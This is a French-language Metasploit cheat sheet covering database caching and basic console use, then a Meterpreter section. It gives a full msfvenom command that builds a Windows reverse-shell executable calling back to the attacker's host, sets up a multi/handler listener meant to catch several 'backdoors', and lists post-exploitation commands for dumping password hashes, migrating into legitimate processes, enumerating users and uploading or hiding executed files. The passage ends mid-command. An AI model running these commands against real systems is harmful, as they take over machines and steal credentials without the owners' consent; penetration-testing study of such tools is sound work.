Metasploit
Mise en cache des outils de Metasploit
msfdb init
service postgresql start
msfconsole
msf > db_rebuild_cache
Cela lance la reconstruction du cache en arrière-plan. Pour savoir quand cette construction est terminée, il suffit de lancer une recherche:
msf > search uac
Et interpréter le résultat !
Ensuite, lorsque la machine est redémarrée, pour profiter de la mise en cache, il faut lancer le service postgresql.
Commandes de base
Lancer Metasploit
msfconsole
Lance une console de Metasploit.
Rechercher dans la base de Metasploit
msf > search <terme>
Avoir des infos sur un module
msf > info <module>
Sélectionner un module pour l'utiliser
msf > use <module>
On entre alors dans une sous-console propre au module, qui nous permet d'effectuer des opérations sur le module:
show options: affiche les options du moduleset <option name> <option value>: défini les optionsexploit: exécute le module
Meterpreter
Meterpreter est une boîte à outils que l'on peut envoyer sur Windows pour ensuite prendre la main du poste. Lors de l'exécution du payload, celui-ci va contacter le poste de l'attaquant, qui aura alors la main sur le poste attaqué.
Générer le payload
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o ./<payload>.exe
LHOST:LPORT est l'adresse de l'attaquant
Lancer le service dans Metasploit pour la prise à distance
C'est ce service que contactera le payload:
msf > use exploit/multi/handler msf > handler > set payload windows/x64/meterpreter/reverse_tcp msf > handler > show options msf > handler > # compléter les options nécessaires: IP: ip de la machine du pirate, PORT: port sur lequel le service va écouter msf > handler > set ExitOnSession false # Quand une backdoor nous a joint, continuer à écouter pour pouvoir répondre à d'autres backdoors. msf > handler > exploit -j -z
Manipulations des sessions
msf > handler > sessions -l # liste les sessions msf > handler > sessions -i <id de la session> # entrer dans une session pour interagir avec meterpreter
Au sein d'une session Meterpreter
meterpreter > background # revient à la console metasploit meterpreter > help meterpreter > sysinfo # donne des infos sur le système meterpreter > getprivs # voir les privilèges dont on dispose meterpreter > shell # lance une invite de commande Windows meterpreter > hashdump # dump la base de mots de passe, nécessite d'être administrateur authentifié meterpreter > migrate # permet de migrer vers un processus existant légitime meterpreter > net users # liste les utilisateurs meterpreter > net user <username> # donne des infos sur l'utilisateur meterpreter > net localgroup Administrators # liste les utilisateurs locaux du groupe Administrators meterpreter > upload <localfile> # charge un fichier local vers la cible du meterpreter meterpreter > execute -H